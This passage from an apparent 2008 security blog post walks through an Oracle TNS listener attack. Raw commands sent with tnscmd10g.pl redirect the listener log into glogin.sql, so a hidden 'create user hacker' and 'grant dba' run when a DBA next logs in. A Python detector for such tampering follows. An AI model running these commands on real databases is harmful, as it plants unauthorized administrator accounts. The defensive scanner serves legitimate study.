     ........"..u(DESCRIPTION=(TMP=)(VSNNUM=153092352)(ERR=0)(COMMAND=log_file)
     (LOGFILENAME=C:\oracle\ora92\sqlplus\admin\glogin.sql))
    

    Now we can inject raw commands into the listener, which will be appended to the log file:

    tnscmd10g.pl -h 192.168.1.102 --rawcmd "(CONNECT_DATA((
    set term off
    create user hacker identified by hacker;
    grant dba to hacker;
    set term on
    host echo hi, you have just been pwned
    "
    

    NOTE: If you want to type the above command instead of pasting it into your console, be sure to use backslashes to create new lines and skip the first line, as follows:

    tnscmd10g.pl -h 192.168.1.102 --rawcmd "(CONNECT_DATA((\
    >
    > set term off
    ...
    

    NOTE: glogin.sql will have the following lines appended to it:

    TNS-01153: Failed to process string: (CONNECT_DATA((
    set term off
    create user hacker identified by hacker;
    grant dba to hacker;
    set term on
    host echo hi, you have just been pwned
    
     NL-00303: syntax error in NV string
    

    Once a DBA logs in with sqlplus, he or she will trigger the startup file:

    SP2-0734: unknown command beginning "09-FEB-200..." - rest of line ignored.
    SP2-0734: unknown command beginning "09-FEB-200..." - rest of line ignored.
    SP2-0734: unknown command beginning "TNS-01153:..." - rest of line ignored.
    hi, you have just been pwned
    
    SP2-0734: unknown command beginning "NL-00303: ..." - rest of line ignored.
    SQL>
    

    At this point there should be a valid account hacker/hacker created with full DBA privileges.
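    From the defender's side, the technique above leaves recognisable residue in the SQL*Plus startup file. The following added Python example (not code from the original post) scans a glogin.sql/login.sql for listener-log timestamps, TNS-/NL- error lines and privileged statements that have no place in a startup file. Both sample files are constructed; the timestamp line follows the date format of the listener output shown above, since the exact listener.log entry is not reproduced on this page.

```python
import re

# Listener log entries start with a timestamp such as "09-FEB-2008 21:29:43" (the date
# format of the listener output above); once log_file points at glogin.sql these lines,
# plus the TNS-01153 / NL-00303 errors shown above, land in the startup file.
LISTENER_TIMESTAMP = re.compile(r"^\d{2}-[A-Z]{3}-\d{4} \d{2}:\d{2}:\d{2}\b")
LISTENER_ERROR = re.compile(r"\b(?:TNS|NL)-\d{5}:")
# Statements a site-wide SQL*Plus startup file should never carry.
PRIVILEGED = re.compile(r"^\s*(?:create\s+user\b|grant\b.*\bdba\b|host\b)", re.IGNORECASE)


def scan_startup_file(text: str) -> list:
    """Return (line_number, reason, line) for each line that looks like listener log
    output or a privileged statement smuggled into glogin.sql/login.sql."""
    findings = []
    for n, line in enumerate(text.splitlines(), start=1):
        if LISTENER_TIMESTAMP.match(line):
            findings.append((n, "listener log timestamp", line))
        elif LISTENER_ERROR.search(line):
            findings.append((n, "listener error code", line))
        elif PRIVILEGED.match(line):
            findings.append((n, "privileged statement", line))
    return findings


# Constructed sample: an ordinary glogin.sql.
CLEAN_GLOGIN = 'set sqlprompt "_user> "\nset linesize 200\n'

# Constructed sample: the same file after the listener log was redirected into it. The
# appended block mirrors the lines quoted above; the timestamp line stands in for the
# listener.log entry whose exact text is not reproduced on this page.
TAMPERED_GLOGIN = CLEAN_GLOGIN + """09-FEB-2008 13:40:02 * log_file * 0
TNS-01153: Failed to process string: (CONNECT_DATA((
set term off
create user hacker identified by hacker;
grant dba to hacker;
set term on
host echo hi, you have just been pwned

 NL-00303: syntax error in NV string
"""

if __name__ == "__main__":
    for lineno, reason, line in scan_startup_file(TAMPERED_GLOGIN):
        print(f"line {lineno}: {reason}: {line.strip()}")
```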

    Published on July 1st, 2008 by iphelix


    All original content on this site is copyright protected and licensed under Creative Commons - Attribution, NonCommercial, ShareAlike 4.0 International.
